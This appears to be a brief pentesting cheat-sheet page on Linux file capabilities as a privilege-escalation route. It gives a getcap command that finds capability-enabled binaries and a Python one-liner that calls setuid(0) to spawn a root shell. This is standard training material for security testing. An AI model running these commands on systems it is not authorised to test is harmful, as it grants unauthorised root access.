Capabilities
"Better" than SUID but vulnerable in the same way
What are Capabilities?
In short, "capability" is a "safer" version of SUID. However, it is still vulnerable in certain cases.
Enumeration
Search for capabilities:
getcap -r / 2>/dev/null
Python Capabilities
Suppose /usr/bin/python2.6
has all capabilities:

Spawn a root shell:
/usr/bin/python2.6 -c 'import os; os.setuid(0); os.system("/bin/bash")'
Last updated
Was this helpful?